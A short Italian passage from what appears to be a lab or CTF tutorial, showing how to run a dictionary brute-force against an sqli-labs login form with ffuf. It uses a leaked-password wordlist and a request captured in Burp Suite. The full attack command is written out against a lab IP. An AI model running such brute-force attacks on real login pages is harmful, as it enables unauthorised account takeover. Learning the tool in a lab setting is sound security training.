Tramite questo programma possiamo anche effettuare attacchi bruteforce, ci basta recuperare i dati fondamentali tramite burpsuite e poi lanciare il seguente comando:
$ ffuf -u http://10.10.125.182/sqli-labs/Less-11/ -c -w /usr/share/seclists/Passwords/Leaked-Databases/hak5.txt -X POST -d 'uname=Dummy&passwd=FUZZ&submit=Submit' -fs 1435 -H 'Content-Type: application/x-www-form-urlencoded'Dove con -X specifichi il metodo, con -d il valore della richiesta e con -H il custom header che a differenza di curl non riesce a trovare in automatico. Ovviamente il parametro con FUZZ è quello a cui andremo a fare l’attacco a dizionario.